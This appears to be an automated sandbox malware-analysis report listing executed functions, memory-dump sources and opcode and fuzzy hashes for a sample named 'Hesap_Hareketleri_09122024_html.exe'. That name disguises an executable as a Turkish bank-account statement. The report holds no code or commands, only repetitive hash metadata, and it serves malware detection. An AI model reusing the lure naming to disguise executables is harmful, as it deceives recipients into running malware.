Opcode ID: e10f82b59036d2819679f229c4a0ef7cc85c0725f1522b4d304e406dcf5e3094
Instruction ID: 6bd17c7cc5578bc469b828e22afe5a6c660a7b845cc1bee333ca2d437f52e718
Opcode Fuzzy Hash: e10f82b59036d2819679f229c4a0ef7cc85c0725f1522b4d304e406dcf5e3094
Instruction Fuzzy Hash: 34512D74E002298FDB54CFA9C9806AEFBF2FF89305F248169D418A7315D7319A42CFA1

Analysis Process: Hesap_Hareketleri_09122024_html.exePID: 6256, Parent PID: 6852COMMON

Executed Functions

Function 012D9DE0 Relevance: 1.1, Instructions: 1137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bf09fc2a84312308f02bc7dcc3a73e3a39c07d5dcc4b32622c5a7ba6bb08c93
Instruction ID: 8b3d01d9fc79692df4b8393ce1daa631191677ae37dc5fd17b213c35221f6b3f
Opcode Fuzzy Hash: 1bf09fc2a84312308f02bc7dcc3a73e3a39c07d5dcc4b32622c5a7ba6bb08c93
Instruction Fuzzy Hash: 4FA27E30A1020ADFCB15CF68C584EAEBBB6BF88310F15856AE505DB3A1D775ED81CB51

Function 012D69A0 Relevance: .5, Instructions: 515COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61125f6535568423c57677972ebcaf5c5d33d3fb5b37e22dcb1b6776bf207ff9
Instruction ID: ba993baddda6013d4104ee9e93f04e014e2297a20daf771e2c3e82fd9b03b4c7
Opcode Fuzzy Hash: 61125f6535568423c57677972ebcaf5c5d33d3fb5b37e22dcb1b6776bf207ff9
Instruction Fuzzy Hash: EC12BF70A1021A9FDB15DFA9D854BAEBBF6BF88300F108569E506DB395DF309D42CB90

Function 012D6FC8 Relevance: .5, Instructions: 509COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38217890ffeb252fe305086623cdb87f3c04271a6bae9fc26ffe9b2e67eefe7a
Instruction ID: ec77eb351d05c9f7e2dbbe5fdd66db645c0f44513c4365888c37e0a763884b10
Opcode Fuzzy Hash: 38217890ffeb252fe305086623cdb87f3c04271a6bae9fc26ffe9b2e67eefe7a
Instruction Fuzzy Hash: 56227D30A10259DFDB15CF68D884AAEBFF6FF88318F55806AE9059B2A1D738DC41CB51

Function 012D3E09 Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a83d107c93564776bce8638be18df1e398c0af73eabc651cb846540b3142c91a
Instruction ID: 5b5c519de885129d560d48736ba1d9a279d1379cfc3cf258052c1211b9a774f4
Opcode Fuzzy Hash: a83d107c93564776bce8638be18df1e398c0af73eabc651cb846540b3142c91a
Instruction Fuzzy Hash: BEF16974F10249CFDB08EFB9D4546AEBBB2BF88301B148569E406EB348DF359942CB91

Function 012DC147 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283b8d96810f1d4fee09a2927b557537a2c5a4bb27fc62a4e51d4113d38d0808
Instruction ID: e0113ea8f19bef7135a1d488c0a5a09898652a3ba0ac087fc90d3e0327e802fd
Opcode Fuzzy Hash: 283b8d96810f1d4fee09a2927b557537a2c5a4bb27fc62a4e51d4113d38d0808
Instruction Fuzzy Hash: 55A10574E10258CFDB54DFBAD884A9DBBF2BF89300F14806AE509AB365DB709946CF50

Function 012DC468 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2de8810f18fc7e1678e07528971a293791dc899a598f27adbf236db5a5f174
Instruction ID: 096e2d5994d217ab7dd15aa1988e8838338c57977b13f4d0d29373de21628da7
Opcode Fuzzy Hash: ee2de8810f18fc7e1678e07528971a293791dc899a598f27adbf236db5a5f174
Instruction Fuzzy Hash: CB91E474E10218CFDB14DFAAD984A9DBBF2FF88300F149069E519AB365DB709945CF50

Function 012D5362 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f854d697d4b8e1bc2c7bad18608b678cf3a1a79cce4281b1d36fb56906f750d7
Instruction ID: d18cb4ceedcfc8a71d8d35af824f4d9e1451da0fcf0ad1ad5f701dc9642cc9b6
Opcode Fuzzy Hash: f854d697d4b8e1bc2c7bad18608b678cf3a1a79cce4281b1d36fb56906f750d7
Instruction Fuzzy Hash: 0B91E574E10258CFDB15DFAAD884A9DBBF2FF89300F14806AD409AB365DB709985CF51

Function 012DD278 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c011aad800537548396e113de56ec3e5208af228d637c8aef3ab1ad6537057ef
Instruction ID: 23fb23ccb927aaa9e5e3c716aa49dd6a647ca399705f45c6ba85e787d2855ac3
Opcode Fuzzy Hash: c011aad800537548396e113de56ec3e5208af228d637c8aef3ab1ad6537057ef
Instruction Fuzzy Hash: 9D81B374E10618CFDB54DFAAD884A9DBBF2FF88300F148069D919AB365DB709985CF50

Function 012DCA08 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf703e68a3264d2d15c022dcda7c09e9925598dd665866e8ac510db3f143842c
Instruction ID: 3c467b4c0e3418007531fc1df3e288cb61a5e933484ed60bf84dce32469045bb
Opcode Fuzzy Hash: bf703e68a3264d2d15c022dcda7c09e9925598dd665866e8ac510db3f143842c
Instruction Fuzzy Hash: DB81A474E10218CFDB14DFAAD884A9DBBF2BF88300F14C169E519AB365DB709985CF50

Function 012DCCD8 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51354b9dbb71a7b8c32b9c16c26075902a69179055a64038e0bf11ff1619e137
Instruction ID: 2226c6d6efe8979c1849eab471daa3dbbc736b114d20ca213c3b74ceffd84b0d
Opcode Fuzzy Hash: 51354b9dbb71a7b8c32b9c16c26075902a69179055a64038e0bf11ff1619e137
Instruction Fuzzy Hash: DA81B374E10218DFEB14DFAAD884A9DBBF2BF88300F14C169E519AB365DB709985CF50

Function 012DC738 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a60dde2779866f88d03129c9dd30efbe1f312f33390b98a2e6cd637082a2632
Instruction ID: ac47376893058bfb489138667cd9d1bd972229cff932bc5694ff5c08628d0c04
Opcode Fuzzy Hash: 2a60dde2779866f88d03129c9dd30efbe1f312f33390b98a2e6cd637082a2632
Instruction Fuzzy Hash: 8881B374E10218CFEB14DFAAD984BADBBF2BF88300F148069E559AB365DB709945CF50

Function 012DCFA9 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52092b4da5fa380145367917609af09c365c62343079a4df9b985012162635ee
Instruction ID: 0b1115e2dd6ba5a6ccf42062e9d6fc38aa443642f8b0cfafa979e0772802f30d
Opcode Fuzzy Hash: 52092b4da5fa380145367917609af09c365c62343079a4df9b985012162635ee
Instruction Fuzzy Hash: E281B374E10618CFEB14DFAAD884A9DBBF2FF88310F148169E519AB365DB709985CF10

Function 012DE988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 938c01efa3f8dc2928bc32202b736ebb56141c9d6636881c12138550881e7393
Instruction ID: cd7885aa846ef546a8cd950a5d2ba5a4413c464d0c36d4bf5452631ddfd40e24
Opcode Fuzzy Hash: 938c01efa3f8dc2928bc32202b736ebb56141c9d6636881c12138550881e7393
Instruction Fuzzy Hash: 6951B474E00209DFEB18DFBAD484A9DBBB2BF88300F24D029E919AB365DB705941CF14

Function 012DE97B Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d91ce84fae5f86a5b603adf7653105492766a6bc79074786041e55116ec26e50
Instruction ID: 43d5029d461e87ba03a06d9f57e171ce81ee3962383459cf579018e68236e21e
Opcode Fuzzy Hash: d91ce84fae5f86a5b603adf7653105492766a6bc79074786041e55116ec26e50
Instruction Fuzzy Hash: D151A674E00209DFEB18DFBAD494A9DBBB2BF88300F25D029E915AB365DB705941CF15

Function 012DE007 Relevance: .7, Instructions: 653COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9395c693f651306026f72cd6f7ba301920c23ff239eb92c1cfdc51fdfe5782a0
Instruction ID: e2c2f71f5539e22424a8cbf228a50299d9712a5a27f9fc002b6bf7c2437f2a8c
Opcode Fuzzy Hash: 9395c693f651306026f72cd6f7ba301920c23ff239eb92c1cfdc51fdfe5782a0
Instruction Fuzzy Hash: 8812BC748A4342AFE3042F60E6AD12ABB61FF5F3237446D04F94FC1E45DB350866CA61

Function 012DE018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8837e59abf00c1811ffdf48851197821a6fe00236a25a75de35376edeea18a0
Instruction ID: 7666fd866276c2eb6bfa70dc61eb7fc34058fd903cca24a4eecc43d49a979714
Opcode Fuzzy Hash: e8837e59abf00c1811ffdf48851197821a6fe00236a25a75de35376edeea18a0
Instruction Fuzzy Hash: 1B12AB748A4343AFE2442F60E6AD12ABB61FF5F323740AD04F94FC1E45DB3548A6CA61

Function 012D0C8F Relevance: .5, Instructions: 546COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5e5ad870137947d7c49fecffaed92e9ecc2ab98603dcebd14bb9a5edd0ebd62
Instruction ID: a97180fd8eb59c6d821a99bd47283ce05476ae85f3a21b290fbc10ca945c0cd2
Opcode Fuzzy Hash: f5e5ad870137947d7c49fecffaed92e9ecc2ab98603dcebd14bb9a5edd0ebd62
Instruction Fuzzy Hash: 4952B575A01219CFDB54EF64E994B9DBBB2FB88301F1085ADE509A7358DB306E85CF80

Function 012D0CA0 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eb83f19dda4c068adb8fc4c559c6e3e96481dabd5a0861755c2d569da910589
Instruction ID: a412d70347eb2ca8c31c1b6df17addb20d890890d5a1482041a28ba73e74af38
Opcode Fuzzy Hash: 3eb83f19dda4c068adb8fc4c559c6e3e96481dabd5a0861755c2d569da910589
Instruction Fuzzy Hash: C352A575A01219CFDB54EF64E994B9DBBB2FB88301F1085ADE509A7358DB306E85CF80

Function 012D76F1 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bda630558bfce6bad7e881844728018895f57dbda26db36962e415e7eafeb83
Instruction ID: e6ea693a7fef7eec241393319968ce57ab28fe574907611e691cd3cd5c75eeac
Opcode Fuzzy Hash: 5bda630558bfce6bad7e881844728018895f57dbda26db36962e415e7eafeb83
Instruction Fuzzy Hash: A5125A30A10249DFDB15CF68D884AAEBBF2FF88318F148599E649DB261DB34ED41CB50

Function 012D5F38 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b55ffffff5b250e5232a50e35aea90cc49c31b43ed4b19c7e18defaed2c09f1a
Instruction ID: 9b21575df62d531db02d854c9652c66f8c5d132ff85957c49aa58620525e4ecb
Opcode Fuzzy Hash: b55ffffff5b250e5232a50e35aea90cc49c31b43ed4b19c7e18defaed2c09f1a
Instruction Fuzzy Hash: 6C91AF307142029FEB169F78D858B7E7BF2BF89200F148969E5468B796CB74CC42CB91

Function 012D6498 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6443dcde850bb7dac119212a549a4fc25a01f0a6d75284547bd1e44eb816bb40
Instruction ID: bf8a988d7cb7f6f51f5198bbf59aa76b238c88ce8d66be1f9343947532f41aed
Opcode Fuzzy Hash: 6443dcde850bb7dac119212a549a4fc25a01f0a6d75284547bd1e44eb816bb40
Instruction Fuzzy Hash: A6819E34A20506CFDB14CFADD488AAABFF2FF89204B1581A9D605DB365DB75EC41CB90

Function 012D80D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0b9a2a767f4c9a7413f2dd108c6b583d7adf47fad3dcaf70f0879d7e8e2359f
Instruction ID: 227afd0c63f824f1739321867886d245ff1bce786a18bdf497fa318e7248234e
Opcode Fuzzy Hash: a0b9a2a767f4c9a7413f2dd108c6b583d7adf47fad3dcaf70f0879d7e8e2359f
Instruction Fuzzy Hash: AC716D347606468FDB15DF6DC898A6E7BE5EF89200B1540A9EA01CB371EB70DC41CB91

Function 012DAEF0 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95d694d5dfbb974b91f57048f4511243d7903d9ed179f59dc385bbb35b9a33e5
Instruction ID: 450e574742b76acbee4cf5abb09c2400d8d98f4fee4fcc5f2243f8bfa45a36a2
Opcode Fuzzy Hash: 95d694d5dfbb974b91f57048f4511243d7903d9ed179f59dc385bbb35b9a33e5
Instruction Fuzzy Hash: 27413A31B10304AFCB159B69D814AAEBFF6AFCD211F0944A9E606C7381DE319C06CB90

Function 012DF3F1 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01669ca0c345e7b6bc3f202677daa3c08a7a69d92e20865219387d591b01ac62
Instruction ID: e564c0fec78491bdd549ac7f1ea74929749b85805c9aa99476d5afc88fa4e5db
Opcode Fuzzy Hash: 01669ca0c345e7b6bc3f202677daa3c08a7a69d92e20865219387d591b01ac62
Instruction Fuzzy Hash: 8F611F74D01319DFDB14DFA5D998AAEBBB2FF88300F208129D806AB395DB755A46CF40

Function 012DD548 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 992515a710f7a2292d4d9b6099401998638bb5f9ab347c1f5f743a52a7bf2d92
Instruction ID: 9ce4b14e0789d5c84de0d75e9105c76195ee67eec38aa452211397aafc2c8e9c
Opcode Fuzzy Hash: 992515a710f7a2292d4d9b6099401998638bb5f9ab347c1f5f743a52a7bf2d92
Instruction Fuzzy Hash: 9A519274E01208DFDB58DFAAD5949DDBBF2BF89300F209169E809AB364DB30A805CF50

Function 012D41A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27ef37bf01d98b7f75b96a820842ced149fab0f81306ba7ad548855aed72ebe8
Instruction ID: b22040efbb805010e44c8d9e75cf593572dbffab40bb3a2825fe406b69e85e88
Opcode Fuzzy Hash: 27ef37bf01d98b7f75b96a820842ced149fab0f81306ba7ad548855aed72ebe8
Instruction Fuzzy Hash: 8C519F75E11348CFCB48DFA9D58499DBBF2FF89301B609469E809AB324DB31A946CF50

Function 012DA303 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42408f73532c4b61a54e311699c5913252eda4b0a64fbfb265d3fa4c079193a
Instruction ID: f63dae8eddca5208fc0ae7d95abea6ec26f7b5561f9dfaabf08f3a46b19e3d02
Opcode Fuzzy Hash: d42408f73532c4b61a54e311699c5913252eda4b0a64fbfb265d3fa4c079193a
Instruction Fuzzy Hash: 5541E531A14249DFCF16CFA8C844E9DBFB2FF89310F048556EA45AB2A2D7B0D915CB60

Function 012D3CC0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27d5f5363dabc8119b340e2ff864924318bb96c7bd5c52258c91ba0c9f839920
Instruction ID: 0b47aa7ed160f97a1f9ff8e464d0250d124e1d8e64422049856578676c7da87a
Opcode Fuzzy Hash: 27d5f5363dabc8119b340e2ff864924318bb96c7bd5c52258c91ba0c9f839920
Instruction Fuzzy Hash: 743107B2B2422687EF18856EC89427E6AE6BBC4310F14403DDA16C3385DFB5CC058BA2

Function 012D8EF8 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c75b4c09d9c0a8ec361f7fddb3c0603f4cc113945fb657fe3b2e2a19db9d8d29
Instruction ID: d75cb273c4c64908cdf08ed42a69e3992dd8b5f75ce09f31e7f37e444f5fb9f9
Opcode Fuzzy Hash: c75b4c09d9c0a8ec361f7fddb3c0603f4cc113945fb657fe3b2e2a19db9d8d29
Instruction Fuzzy Hash: 1431C0303282528FDB268B2DD8A467E7B67BB85700B5508EAF312CB292DB64CC818755

Function 012D9C30 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a3e9c8885bbacd65cce70721a952439a6c539b75fff25050cc5b1591d6f0703
Instruction ID: 379f152e5e054bba7430a6d0627e837488b8b3157c568fabffb2ddd4e0f29471
Opcode Fuzzy Hash: 7a3e9c8885bbacd65cce70721a952439a6c539b75fff25050cc5b1591d6f0703
Instruction Fuzzy Hash: D041A0307242469FDB02DF68C844B6E7BE6EF89308F448466FA48CB256D771DC86CB61

Function 012D5658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f28ba8091e45de51d97b045ad950075faea8ffd282d6f7cff5b1a36522d21090
Instruction ID: 240ef1733bdeaec5079e42d62726bdc4f326a65fe95686d9200ccd6ce7ce5b81
Opcode Fuzzy Hash: f28ba8091e45de51d97b045ad950075faea8ffd282d6f7cff5b1a36522d21090
Instruction Fuzzy Hash: 18318F3170520AEFDB069F65E854AAF3FB2FB48200F104415FA558B794CB75DD22DB90

Function 012D8380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47982755d5758245e1faa0b6909c74c9b11d0eb3a0650f8edd7513decdab2fda
Instruction ID: 6cfa7edccf6da04aebe690e64790354ba8938b8cf3a75b0bf14f133a35fcd85b
Opcode Fuzzy Hash: 47982755d5758245e1faa0b6909c74c9b11d0eb3a0650f8edd7513decdab2fda
Instruction Fuzzy Hash: E321A1703242025BEB165A2EC854B7E369BEFC8758F24843DD606CB799EEB5CC42D381

Function 012D2790 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c15e635ee17e7af7bb0b9af61a63730c01ecd5a62f6d170e78c8d47ea6547948
Instruction ID: f931f02afc5ce4bedec9fc5bbc36dbb81bf921104c32f87c78f745a34f566515
Opcode Fuzzy Hash: c15e635ee17e7af7bb0b9af61a63730c01ecd5a62f6d170e78c8d47ea6547948
Instruction Fuzzy Hash: 97317A74D1928ACFDB05EFB8D4556EDBFB1EF4A300F0445AAC545E7251EB300949CB92

Function 012D28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b55d1cef083c9643a2d0793c98c3d5400575c54547e293a2e4987cfaf1a542b2
Instruction ID: 3567131b48d6ce37da5302610329af64048682a34d9fc18e81395391c26c8ebc
Opcode Fuzzy Hash: b55d1cef083c9643a2d0793c98c3d5400575c54547e293a2e4987cfaf1a542b2
Instruction Fuzzy Hash: C721A135A00156EFCB15DB28D8409EE77A5EB9D3A0B60C459E9099B340DB31EA46CBE0

Function 012D6300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793671140.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_12d0000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5d2bba2db6b675abc9bbe4bd55a71545acb1275267c18a02d0a6f749128335d
Instruction ID: c19d32c330b075706aaadf49cc7d24017c151cb2239ac339b6909f5cb28f358c
Opcode Fuzzy Hash: f5d2bba2db6b675abc9bbe4bd55a71545acb1275267c18a02d0a6f749128335d
Instruction Fuzzy Hash: 022124357056129FD7299B29D45492FB7A2FFC9B517044479EA06CB794CF70DC02CB80

Function 010FD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4793203177.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10fd000_Hesap_Hareketleri_09122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a1dd66a1429303a2ab69203c70253408f8d5ee95943c9fb1432ede749628ab6
Instruction ID: 86bb901b4d74f1b3ae2a2425860059dc5e3f63274b1a79af062a5ed9a2a79003
